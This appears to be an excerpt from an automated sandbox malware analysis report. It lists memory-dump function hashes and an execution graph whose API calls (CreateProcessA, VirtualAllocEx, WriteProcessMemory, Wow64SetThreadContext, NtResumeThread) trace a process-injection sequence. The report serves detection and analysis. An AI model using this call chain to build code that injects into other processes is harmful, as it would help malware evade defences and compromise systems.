                                                                          • Opcode ID: a71e4ef22717330efc1b5ba5539f8d7fb3a26e5d3d7bbfbf3b238c5527c7e204
                                                                          • Instruction ID: 9fccfdad736ef523078712be1b33ecaf81029f10c3104b58177a5a0e9ec188e8
                                                                          • Opcode Fuzzy Hash: a71e4ef22717330efc1b5ba5539f8d7fb3a26e5d3d7bbfbf3b238c5527c7e204
                                                                          • Instruction Fuzzy Hash: ECE06831D04228DBCB048EE5EC093FDF376D78A301F406420C008E3381EB70D96AC6A1
                                                                          Function 02D2DF18 Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c336334999615b1227168743748dc10324c49f8bcaa51ad6131ecb08d8a5d57
                                                                          • Instruction ID: 0c69a3c4eaecd1044a3d4f7a9523799dfabf7dbe0cddc3da87802d4a503dff2e
                                                                          • Opcode Fuzzy Hash: 6c336334999615b1227168743748dc10324c49f8bcaa51ad6131ecb08d8a5d57
                                                                          • Instruction Fuzzy Hash: DAE06832C00214DBCB04CE95E8093FEF375E7CA310F405821D508F3290DB70D4A9C696
                                                                          Function 02D2D4C4 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ffd5712c926b5f898fad5df6f7b9fd01ae10e184b071d59ca382cfe7197b8ad0
                                                                          • Instruction ID: 492f2f327a2cb320ca2c2ef44ddfa1516201a68bade92d73e8c7ef8ade985019
                                                                          • Opcode Fuzzy Hash: ffd5712c926b5f898fad5df6f7b9fd01ae10e184b071d59ca382cfe7197b8ad0
                                                                          • Instruction Fuzzy Hash: 41E026A2C0C160CFD7058BA658160B9BF35DDF7289784A0C7D089DB221D259EA1BDB11
                                                                          Function 02D22010 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 56345921ca0329a61e1af9ae8bef7d7ac3ffb17c3fdfe004f28e1fc2ea7b3e42
                                                                          • Instruction ID: 8461597cb8dde2a8167845843eb0ae9a5709e8c8fd364177274743179c741b71
                                                                          • Opcode Fuzzy Hash: 56345921ca0329a61e1af9ae8bef7d7ac3ffb17c3fdfe004f28e1fc2ea7b3e42
                                                                          • Instruction Fuzzy Hash: 34E04F32D1022A96CB10DBE5E8949DEB778EF95290F505A16D52467000EB70355A86A2
                                                                          Function 02D22020 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 77507df01025efb9a9e38d3fb425bd8a168bc4c1ab89605aceea6ae39ece3131
                                                                          • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                          • Opcode Fuzzy Hash: 77507df01025efb9a9e38d3fb425bd8a168bc4c1ab89605aceea6ae39ece3131
                                                                          • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                          Function 02D28270 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                          • Instruction ID: d24343a3e1494fce4701f0bcb31837aeb433b819011cd3f3ba70c296c7e671c6
                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                          • Instruction Fuzzy Hash: C7C08C3320C5382EA624108F7C48FABBB8CE3C16B9A250137F59CD33009842DC8891F8
                                                                          Function 02D2A71D Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85d924dbe186d86705c12890e382bed06af74b4fcdcf4178a362ba8029a01e02
                                                                          • Instruction ID: f9a9dc60acf302c4ed538a65fa54a64a51bc8e9da56ca028c31e680cb93d5222
                                                                          • Opcode Fuzzy Hash: 85d924dbe186d86705c12890e382bed06af74b4fcdcf4178a362ba8029a01e02
                                                                          • Instruction Fuzzy Hash: 7FD0677BB410189FCB049F98E8408DDFBB6FB9C221B458516E915A7261C6319921DB50
                                                                          Function 02D25EB0 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 70727dfad7a618f268aae757a219adabae142dbe6c590973c22a4c5f0263f8be
                                                                          • Instruction ID: 23eecad521e3be94c4cc5fd0cd8a1940c55b3d641e89a6c0ce018266ef1a1f49
                                                                          • Opcode Fuzzy Hash: 70727dfad7a618f268aae757a219adabae142dbe6c590973c22a4c5f0263f8be
                                                                          • Instruction Fuzzy Hash: E0D0C27050C38A4FC71AB731BAA28587F3AAA81208B9445A5D8014542AEA79880ECB31
                                                                          Function 02D2FBFB Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5125857a7dc40f6ae483b98abe7039d545560d4bc57c457e8be4f36a2ceb4fdc
                                                                          • Instruction ID: 2029df886cc6f7a69f5396abfa435e52c402ae391859268d4a34a28f19adc488
                                                                          • Opcode Fuzzy Hash: 5125857a7dc40f6ae483b98abe7039d545560d4bc57c457e8be4f36a2ceb4fdc
                                                                          • Instruction Fuzzy Hash: DDD06C78D8412C8BCB20EFA8EA546ECB7B1EF99304F0028E69849B2210D6705E649F21
                                                                          Function 02D25EC0 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 99f045ffd66abd5a6a8f74170be9d2893c1b329e12c6d1b8fdc506a712b56832
                                                                          • Instruction ID: 5de8acce342fb54e84f2e108ff6a83576a366aa0b20e510ddfe148caf3fd5470
                                                                          • Opcode Fuzzy Hash: 99f045ffd66abd5a6a8f74170be9d2893c1b329e12c6d1b8fdc506a712b56832
                                                                          • Instruction Fuzzy Hash: 50C0127054C30E4FC649FB76FA55915B72FBAC0204F904560A00A0613DEF78D84CCAB0

                                                                          Non-executed Functions

                                                                          Function 05AE2809 Relevance: 12.9, Strings: 10, Instructions: 419COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-2373693423
                                                                          • Opcode ID: d8b2c7339192e5cf30d1161dccbccb89c7a9d0d9b79c1fe4e635e7adcc200c0e
                                                                          • Instruction ID: da0e8d5cf9f40f86ee10436593f2133d4d83a7f708ae07eba401475d95b6a107
                                                                          • Opcode Fuzzy Hash: d8b2c7339192e5cf30d1161dccbccb89c7a9d0d9b79c1fe4e635e7adcc200c0e
                                                                          • Instruction Fuzzy Hash: 2E12F3B4E002188FDB58DF69D994B9DBBF6BF89300F1084A9D809A7365DB359E85CF10
                                                                          Function 05AE2807 Relevance: 12.9, Strings: 10, Instructions: 388COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-2373693423
                                                                          • Opcode ID: fe28bcd5b873a200eee01996358d24cd2bcf7a6d9734c24f43ae0d5b8acf8fb3
                                                                          • Instruction ID: 6b18f9a1c13fc4faedd439d93c62c34719ccefb5134dc0100fa736644630996e
                                                                          • Opcode Fuzzy Hash: fe28bcd5b873a200eee01996358d24cd2bcf7a6d9734c24f43ae0d5b8acf8fb3
                                                                          • Instruction Fuzzy Hash: 6012C1B4E002188FDB58DF69D994B9DBBF2BF89300F1084A9D819A7365DB359E85CF10
                                                                          Function 05AE28B0 Relevance: 11.7, Strings: 9, Instructions: 461COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-3604444728
                                                                          • Opcode ID: 7297caa0f1febf5d0c08a023af1e27cbe313328e67043e7873776efd5106c592
                                                                          • Instruction ID: f89e9b1caadd363c24d2166cfd78a8ef56b1324bb92ed738c4d8bc8ca4a08ed5
                                                                          • Opcode Fuzzy Hash: 7297caa0f1febf5d0c08a023af1e27cbe313328e67043e7873776efd5106c592
                                                                          • Instruction Fuzzy Hash: F632B0B4E00218CFDB68CF69D994B9DBBB2BF89300F1084A9D909A7365DB755E85CF10
                                                                          Function 02D260A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \;]q$\;]q$\;]q$\;]q
                                                                          • API String ID: 0-2351511683
                                                                          • Opcode ID: 9102db545506dd3e6b8457723456591a83f710c482c14022d04dcd4cf413698f
                                                                          • Instruction ID: c183471ca9250d575a5591b66d12b177ae6badad86d67badb99d1ab8bbe09783
                                                                          • Opcode Fuzzy Hash: 9102db545506dd3e6b8457723456591a83f710c482c14022d04dcd4cf413698f
                                                                          • Instruction Fuzzy Hash: 35015E31740234CF87548A2DC69092677EEAF98A6873545AAE441CB3B1DA62DC45D7D0

                                                                          Execution Graph

                                                                          Execution Coverage:14.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:538
                                                                          Total number of Limit Nodes:58
                                                                          execution_graph 66339 769cf98 66340 769cfe6 NtProtectVirtualMemory 66339->66340 66342 769d030 66340->66342 65845 74cb37f 65846 74cb389 65845->65846 65850 7624bd0 65846->65850 65856 7624bc0 65846->65856 65847 74cb13f 65851 7624be5 65850->65851 65862 7624c00 65851->65862 65867 7624c10 65851->65867 65872 7624e65 65851->65872 65852 7624bfb 65852->65847 65857 7624bd0 65856->65857 65859 7624c00 2 API calls 65857->65859 65860 7624c10 2 API calls 65857->65860 65861 7624e65 2 API calls 65857->65861 65858 7624bfb 65858->65847 65859->65858 65860->65858 65861->65858 65864 7624c10 65862->65864 65863 7624c79 65863->65852 65864->65863 65877 76286b0 65864->65877 65881 76286aa 65864->65881 65869 7624c37 65867->65869 65868 7624c79 65868->65852 65869->65868 65870 76286b0 SleepEx 65869->65870 65871 76286aa SleepEx 65869->65871 65870->65869 65871->65869 65874 7624c67 65872->65874 65873 7624c79 65873->65852 65874->65873 65875 76286b0 SleepEx 65874->65875 65876 76286aa SleepEx 65874->65876 65875->65874 65876->65874 65878 76286f0 SleepEx 65877->65878 65880 762872e 65878->65880 65880->65864 65882 76286af SleepEx 65881->65882 65884 762872e 65882->65884 65884->65864 65671 134a230 65675 134a317 65671->65675 65680 134a328 65671->65680 65672 134a23f 65676 134a339 65675->65676 65677 134a35c 65675->65677 65676->65677 65678 134a560 GetModuleHandleW 65676->65678 65677->65672 65679 134a58d 65678->65679 65679->65672 65681 134a35c 65680->65681 65683 134a339 65680->65683 65681->65672 65682 134a560 GetModuleHandleW 65684 134a58d 65682->65684 65683->65681 65683->65682 65684->65672 65918 74cb798 65919 74cb7a2 65918->65919 65923 7694840 65919->65923 65929 7694850 65919->65929 65920 74cb7e0 65924 7694850 65923->65924 65935 7694880 65924->65935 65939 7694890 65924->65939 65943 76949bf 65924->65943 65925 769487b 65925->65920 65930 7694865 65929->65930 65932 76949bf 10 API calls 65930->65932 65933 7694880 10 API calls 65930->65933 65934 7694890 10 API calls 65930->65934 65931 769487b 65931->65920 65932->65931 65933->65931 65934->65931 65937 769488e 65935->65937 65936 76948fc 65936->65925 65937->65936 65947 7695dc9 65937->65947 65941 76948ba 65939->65941 65940 76948fc 65940->65925 65941->65940 65942 7695dc9 10 API calls 65941->65942 65942->65941 65944 76948ed 65943->65944 65945 76948fc 65944->65945 65946 7695dc9 10 API calls 65944->65946 65945->65925 65946->65944 65948 7695ded 65947->65948 65964 76961cc 65948->65964 65968 7695ea9 65948->65968 65972 7695e28 65948->65972 65976 7695fd1 65948->65976 65980 7695e17 65948->65980 65984 769613c 65948->65984 65988 7695f5f 65948->65988 65992 7696124 65948->65992 65996 7696339 65948->65996 66000 7695ee3 65948->66000 66004 76960e2 65948->66004 66008 7696300 65948->66008 66012 7695f43 65948->66012 66016 7695f6b 65948->66016 65949 7695e0f 65949->65937 65966 7695e8d 65964->65966 65965 7695f48 65965->65949 65966->65965 66020 7696740 65966->66020 65970 7695e8d 65968->65970 65969 7695f48 65969->65949 65970->65969 65971 7696740 10 API calls 65970->65971 65971->65970 65973 7695e55 65972->65973 65974 7695f48 65973->65974 65975 7696740 10 API calls 65973->65975 65974->65949 65975->65973 65978 7695e8d 65976->65978 65977 7695f48 65977->65949 65978->65977 65979 7696740 10 API calls 65978->65979 65979->65978 65982 7695e28 65980->65982 65981 7695f48 65981->65949 65982->65981 65983 7696740 10 API calls 65982->65983 65983->65982 65986 7695e8d 65984->65986 65985 7695f48 65985->65949 65986->65985 65987 7696740 10 API calls 65986->65987 65987->65986 65989 7695e8d 65988->65989 65990 7695f48 65989->65990 65991 7696740 10 API calls 65989->65991 65990->65949 65991->65989 65994 7695e8d 65992->65994 65993 7695f48 65993->65949 65994->65993 65995 7696740 10 API calls 65994->65995 65995->65994 65998 7695e8d 65996->65998 65997 7695f48 65997->65949 65998->65997 65999 7696740 10 API calls 65998->65999 65999->65998 66002 7695e8d 66000->66002 66001 7695f48 66001->65949 66002->66001 66003 7696740 10 API calls 66002->66003 66003->66002 66005 7695e8d 66004->66005 66006 7695f48 66005->66006 66007 7696740 10 API calls 66005->66007 66006->65949 66007->66005 66009 7695e8d 66008->66009 66010 7695f48 66009->66010 66011 7696740 10 API calls 66009->66011 66010->65949 66011->66009 66013 7695f48 66012->66013 66014 7695e8d 66012->66014 66013->65949 66014->66013 66015 7696740 10 API calls 66014->66015 66015->66014 66018 7695e8d 66016->66018 66017 7695f48 66017->65949 66018->66017 66019 7696740 10 API calls 66018->66019 66019->66018 66021 7696765 66020->66021 66045 7696787 66021->66045 66054 7696a5f 66021->66054 66059 76968da 66021->66059 66064 7696c1d 66021->66064 66069 7696c98 66021->66069 66074 7697985 66021->66074 66079 7696c58 66021->66079 66084 7697282 66021->66084 66092 7697885 66021->66092 66100 7697840 66021->66100 66105 7697243 66021->66105 66113 76969c8 66021->66113 66118 76977c1 66021->66118 66123 76976f6 66021->66123 66128 7696e09 66021->66128 66133 7697131 66021->66133 66138 7696db4 66021->66138 66146 769763e 66021->66146 66151 76973b1 66021->66151 66156 769783b 66021->66156 66161 76968fe 66021->66161 66169 76975b8 66021->66169 66174 769773b 66021->66174 66182 7696cf9 66021->66182 66187 7697379 66021->66187 66192 76974ac 66021->66192 66197 7696b63 66021->66197 66202 7696d56 66021->66202 66207 7697916 66021->66207 66212 7696e10 66021->66212 66220 7696fd2 66021->66220 66225 76976dc 66021->66225 66045->65966 66055 7696a61 66054->66055 66233 769edb9 66055->66233 66237 769edc0 66055->66237 66056 7696b06 66056->66045 66061 76968a6 66059->66061 66060 769681b 66061->66060 66241 769e510 66061->66241 66245 769e518 66061->66245 66065 76968a6 66064->66065 66066 769681b 66065->66066 66067 769e518 Wow64SetThreadContext 66065->66067 66068 769e510 Wow64SetThreadContext 66065->66068 66067->66065 66068->66065 66070 76968a6 66069->66070 66071 769681b 66070->66071 66072 769e518 Wow64SetThreadContext 66070->66072 66073 769e510 Wow64SetThreadContext 66070->66073 66072->66070 66073->66070 66075 76968a6 66074->66075 66076 769681b 66075->66076 66077 769e518 Wow64SetThreadContext 66075->66077 66078 769e510 Wow64SetThreadContext 66075->66078 66077->66075 66078->66075 66080 76968a6 66079->66080 66081 769681b 66080->66081 66082 769e518 Wow64SetThreadContext 66080->66082 66083 769e510 Wow64SetThreadContext 66080->66083 66082->66080 66083->66080 66085 769728c 66084->66085 66249 769eb20 66085->66249 66253 769eb18 66085->66253 66086 76968a6 66087 769681b 66086->66087 66088 769e518 Wow64SetThreadContext 66086->66088 66089 769e510 Wow64SetThreadContext 66086->66089 66088->66086 66089->66086 66095 7697894 66092->66095 66093 769681b 66094 76968a6 66094->66093 66096 769e518 Wow64SetThreadContext 66094->66096 66097 769e510 Wow64SetThreadContext 66094->66097 66098 769edb9 WriteProcessMemory 66095->66098 66099 769edc0 WriteProcessMemory 66095->66099 66096->66094 66097->66094 66098->66094 66099->66094 66101 76968a6 66100->66101 66102 769681b 66101->66102 66103 769e518 Wow64SetThreadContext 66101->66103 66104 769e510 Wow64SetThreadContext 66101->66104 66103->66101 66104->66101 66106 7696e14 66105->66106 66107 76968a6 66105->66107 66109 769e518 Wow64SetThreadContext 66106->66109 66110 769e510 Wow64SetThreadContext 66106->66110 66108 769681b 66107->66108 66111 769e518 Wow64SetThreadContext 66107->66111 66112 769e510 Wow64SetThreadContext 66107->66112 66109->66107 66110->66107 66111->66107 66112->66107 66114 76968a6 66113->66114 66115 769681b 66114->66115 66116 769e518 Wow64SetThreadContext 66114->66116 66117 769e510 Wow64SetThreadContext 66114->66117 66116->66114 66117->66114 66120 76968a6 66118->66120 66119 769681b 66120->66119 66121 769e518 Wow64SetThreadContext 66120->66121 66122 769e510 Wow64SetThreadContext 66120->66122 66121->66120 66122->66120 66124 76968a6 66123->66124 66125 769681b 66124->66125 66126 769e518 Wow64SetThreadContext 66124->66126 66127 769e510 Wow64SetThreadContext 66124->66127 66126->66124 66127->66124 66130 76968a6 66128->66130 66129 769681b 66130->66129 66131 769e518 Wow64SetThreadContext 66130->66131 66132 769e510 Wow64SetThreadContext 66130->66132 66131->66130 66132->66130 66134 76968a6 66133->66134 66135 769681b 66134->66135 66136 769e518 Wow64SetThreadContext 66134->66136 66137 769e510 Wow64SetThreadContext 66134->66137 66136->66134 66137->66134 66139 7696dc1 66138->66139 66141 76968a6 66139->66141 66144 769e518 Wow64SetThreadContext 66139->66144 66145 769e510 Wow64SetThreadContext 66139->66145 66140 769681b 66141->66140 66142 769e518 Wow64SetThreadContext 66141->66142 66143 769e510 Wow64SetThreadContext 66141->66143 66142->66141 66143->66141 66144->66141 66145->66141 66147 76968a6 66146->66147 66148 769681b 66147->66148 66149 769e518 Wow64SetThreadContext 66147->66149 66150 769e510 Wow64SetThreadContext 66147->66150 66149->66147 66150->66147 66152 76973c0 66151->66152 66154 769edb9 WriteProcessMemory 66152->66154 66155 769edc0 WriteProcessMemory 66152->66155 66153 7697441 66153->66045 66154->66153 66155->66153 66158 76968a6 66156->66158 66157 769681b 66158->66157 66159 769e518 Wow64SetThreadContext 66158->66159 66160 769e510 Wow64SetThreadContext 66158->66160 66159->66158 66160->66158 66162 7696907 66161->66162 66257 769f428 66162->66257 66261 769f430 66162->66261 66163 76968a6 66164 769681b 66163->66164 66167 769e518 Wow64SetThreadContext 66163->66167 66168 769e510 Wow64SetThreadContext 66163->66168 66167->66163 66168->66163 66170 76968a6 66169->66170 66171 769681b 66170->66171 66172 769e518 Wow64SetThreadContext 66170->66172 66173 769e510 Wow64SetThreadContext 66170->66173 66172->66170 66173->66170 66175 7697753 66174->66175 66265 7697ff0 66175->66265 66269 7697fea 66175->66269 66176 76968a6 66177 769681b 66176->66177 66178 769e518 Wow64SetThreadContext 66176->66178 66179 769e510 Wow64SetThreadContext 66176->66179 66178->66176 66179->66176 66183 76968a6 66182->66183 66184 769681b 66183->66184 66185 769e518 Wow64SetThreadContext 66183->66185 66186 769e510 Wow64SetThreadContext 66183->66186 66185->66183 66186->66183 66188 76968a6 66187->66188 66189 769681b 66188->66189 66190 769e518 Wow64SetThreadContext 66188->66190 66191 769e510 Wow64SetThreadContext 66188->66191 66190->66188 66191->66188 66194 76968a6 66192->66194 66193 769681b 66194->66193 66195 769e518 Wow64SetThreadContext 66194->66195 66196 769e510 Wow64SetThreadContext 66194->66196 66195->66194 66196->66194 66198 76968a6 66197->66198 66199 769681b 66198->66199 66200 769e518 Wow64SetThreadContext 66198->66200 66201 769e510 Wow64SetThreadContext 66198->66201 66200->66198 66201->66198 66204 76968a6 66202->66204 66203 769681b 66204->66203 66205 769e518 Wow64SetThreadContext 66204->66205 66206 769e510 Wow64SetThreadContext 66204->66206 66205->66204 66206->66204 66208 76968a6 66207->66208 66209 769681b 66208->66209 66210 769e518 Wow64SetThreadContext 66208->66210 66211 769e510 Wow64SetThreadContext 66208->66211 66210->66208 66211->66208 66217 7696e30 66212->66217 66213 76968a6 66214 769681b 66213->66214 66215 769e518 Wow64SetThreadContext 66213->66215 66216 769e510 Wow64SetThreadContext 66213->66216 66215->66213 66216->66213 66218 769e518 Wow64SetThreadContext 66217->66218 66219 769e510 Wow64SetThreadContext 66217->66219 66218->66213 66219->66213 66221 76968a6 66220->66221 66221->66220 66222 769681b 66221->66222 66223 769e518 Wow64SetThreadContext 66221->66223 66224 769e510 Wow64SetThreadContext 66221->66224 66223->66221 66224->66221 66226 76968a6 66225->66226 66227 76972a8 66225->66227 66228 769681b 66226->66228 66229 769e518 Wow64SetThreadContext 66226->66229 66230 769e510 Wow64SetThreadContext 66226->66230 66231 769eb18 VirtualAllocEx 66227->66231 66232 769eb20 VirtualAllocEx 66227->66232 66229->66226 66230->66226 66231->66226 66232->66226 66234 769edc0 WriteProcessMemory 66233->66234 66236 769ee5f 66234->66236 66236->66056 66238 769ee08 WriteProcessMemory 66237->66238 66240 769ee5f 66238->66240 66240->66056 66242 769e518 Wow64SetThreadContext 66241->66242 66244 769e5a5 66242->66244 66244->66061 66246 769e55d Wow64SetThreadContext 66245->66246 66248 769e5a5 66246->66248 66248->66061 66250 769eb60 VirtualAllocEx 66249->66250 66252 769eb9d 66250->66252 66252->66086 66254 769eb60 VirtualAllocEx 66253->66254 66256 769eb9d 66254->66256 66256->66086 66258 769f430 NtResumeThread 66257->66258 66260 769f4ad 66258->66260 66260->66163 66262 769f478 NtResumeThread 66261->66262 66264 769f4ad 66262->66264 66264->66163 66266 7698007 66265->66266 66268 7698029 66266->66268 66273 76984c7 66266->66273 66268->66176 66270 7697ff0 66269->66270 66271 76984c7 2 API calls 66270->66271 66272 7698029 66270->66272 66271->66272 66272->66176 66274 76984d6 66273->66274 66278 769d9fc 66274->66278 66282 769da08 66274->66282 66279 769da01 CreateProcessA 66278->66279 66281 769dbf4 66279->66281 66283 769da6c CreateProcessA 66282->66283 66285 769dbf4 66283->66285 66343 134c5c0 66344 134c606 66343->66344 66345 134c6f3 66344->66345 66348 134cb99 66344->66348 66351 134cba8 66344->66351 66349 134cbd6 66348->66349 66354 134c7d4 66348->66354 66349->66345 66352 134c7d4 DuplicateHandle 66351->66352 66353 134cbd6 66352->66353 66353->66345 66355 134cc10 DuplicateHandle 66354->66355 66356 134cca6 66355->66356 66356->66349 65885 74cbbf9 65886 74cbc03 65885->65886 65890 7629a78 65886->65890 65895 7629a68 65886->65895 65887 74cb13f 65891 7629a8d 65890->65891 65900 7629c14 65891->65900 65909 7629c9e 65891->65909 65892 7629aa3 65892->65887 65896 7629a8d 65895->65896 65898 7629c14 2 API calls 65896->65898 65899 7629c9e 2 API calls 65896->65899 65897 7629aa3 65897->65887 65898->65897 65899->65897 65901 7629c3d 65900->65901 65902 7629dbc 65901->65902 65903 7629f57 65901->65903 65905 7629731 VirtualProtect 65901->65905 65906 7629738 VirtualProtect 65901->65906 65907 7629731 VirtualProtect 65902->65907 65908 7629738 VirtualProtect 65902->65908 65903->65892 65904 7629e13 65904->65892 65905->65901 65906->65901 65907->65904 65908->65904 65911 7629ca4 65909->65911 65910 7629f57 65910->65892 65911->65910 65912 7629dbc 65911->65912 65914 7629731 VirtualProtect 65911->65914 65915 7629738 VirtualProtect 65911->65915 65916 7629731 VirtualProtect 65912->65916 65917 7629738 VirtualProtect 65912->65917 65913 7629e13 65913->65892 65914->65911 65915->65911 65916->65913 65917->65913 66286 7430c98 66287 7430cb5 66286->66287 66288 7430cc5 66287->66288 66293 7431f13 66287->66293 66298 7436e3e 66287->66298 66302 7436b0b 66287->66302 66305 743a07a 66287->66305 66294 743a080 66293->66294 66310 7490f58 66294->66310 66314 7490f48 66294->66314 66295 7431508 66299 7436e5d 66298->66299 66331 743e638 66299->66331 66304 743e638 VirtualProtect 66302->66304 66303 7436b29 66303->66288 66304->66303 66306 743a080 66305->66306 66308 7490f48 2 API calls 66306->66308 66309 7490f58 2 API calls 66306->66309 66307 7431508 66308->66307 66309->66307 66311 7490f6d 66310->66311 66318 7490f98 66311->66318 66315 7490f58 66314->66315 66317 7490f98 2 API calls 66315->66317 66316 7490f85 66316->66295 66317->66316 66320 7490fcf 66318->66320 66319 7490f85 66319->66295 66323 74910a8 66320->66323 66327 74910b0 66320->66327 66324 74910b0 VirtualAlloc 66323->66324 66326 749112a 66324->66326 66326->66319 66328 74910f0 VirtualAlloc 66327->66328 66330 749112a 66328->66330 66330->66319 66333 743e65f 66331->66333 66335 743f5b0 66333->66335 66336 743f5f8 VirtualProtect 66335->66336 66338 7436e81 66336->66338 65718 1344528 65719 1344536 65718->65719 65722 1343cf4 65719->65722 65721 134453f 65723 1343cff 65722->65723 65726 13440d0 65723->65726 65725 1344565 65725->65721 65727 13440db 65726->65727 65730 13440e0 65727->65730 65729 1344605 65729->65725 65731 13440eb 65730->65731 65734 1344214 65731->65734 65733 13446e2 65733->65729 65735 134421f 65734->65735 65738 1344244 65735->65738 65737 13447f4 65737->65733 65739 134424f 65738->65739 65740 1347580 65739->65740 65747 1347828 65739->65747 65752 1345434 